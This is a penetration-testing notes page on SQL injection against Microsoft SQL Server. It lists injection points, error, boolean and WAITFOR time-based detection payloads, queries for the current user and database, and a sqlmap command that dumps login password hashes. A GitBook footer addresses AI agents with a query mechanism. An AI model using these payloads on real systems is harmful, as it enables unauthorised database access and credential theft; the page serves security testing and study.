> For the complete documentation index, see [llms.txt](https://notes.qazeer.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.qazeer.io/web-applications/exploitation-sql_injections/mssql.md).

# MSSQL.md

Microsoft SQL Server is a relational database management system developed by Microsoft.\
Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available : <https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an>

**MSSQL supports stacked queries.**

### Vulnerable parameters detection

**Injection locations**

In a HTTP request there are a few possible injection points :

* URL parameters
* POST parameters
* Cookie names and values
* Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

**Injection detection**

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application.\
Supplying malformed queries will trigger errors and sending valid queries with various boolean logic statements may trigger different responses from the web server.\
Time based payload can also be used to detect SQL injection in MSSQL.

| Technique                                                                                 | Queries                                                                                                                                                                                                       |
| ----------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| <p>Error<br><em>A direct message can be returned or the page may act differently</em></p> | <p><code>x='</code><br><code>x=''</code><br><code>x="</code><br><code>x=""</code><br><code>x=\</code><br><code>x=\\</code><br><code>x='</code><br><code>...</code></p>                                        |
| <p>Boolean Testing<br><em>Page can react differently if true or false</em></p>            | <p><code>x=1 or 1=1 -- true</code><br><code>x=1' or 1=1 -- true</code><br><code>x=1" or 1=1 -- true</code><br><code>x=1 or 1=2 -- false</code><br><code>...</code></p>                                        |
| <p>Time Based<br><em>A delay can be induced by the query execution</em></p>               | <p><code>x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds</code><br><code>x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds</code><br><code>x=1 WAITFOR TIME '22:42' -- Wait until 22:42</code><br><code>...</code></p> |

**Automated detection**

The detection of vulnerable parameters can be automated, using the `BurpSuite Pro scanner` or `sqlmap` for example.

Note that second order SQL injection, which arises when user-supplied data is first stored by the application and then later incorporated into SQL queries in an unsafe manners, may not be properly detected by automatic tools.

### Databases dumping

| Description                | Queries                                                                                             |
| -------------------------- | --------------------------------------------------------------------------------------------------- |
| Comments                   |                                                                                                     |
| Encoding queries           |                                                                                                     |
| Obfuscating queries        |                                                                                                     |
| Disable logging mechanisms |                                                                                                     |
| MSSQL version              |                                                                                                     |
| Current user               | `SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))`                                                      |
| Users and privileges       |                                                                                                     |
| Users' passwords           | <p>Using <code>sqlmap</code>:<br><code>sqlmap -D master -T sys.sql\_logins --dump \[...]</code></p> |
| Databases                  |                                                                                                     |
| Current database           | `SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))`                                                        |
| Tables                     |                                                                                                     |
| Columns                    |                                                                                                     |
| Data                       |                                                                                                     |

***

### References

<https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/> <https://www.asafety.fr/mssql-injection-cheat-sheet> <http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet> <https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://notes.qazeer.io/web-applications/exploitation-sql_injections/mssql.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.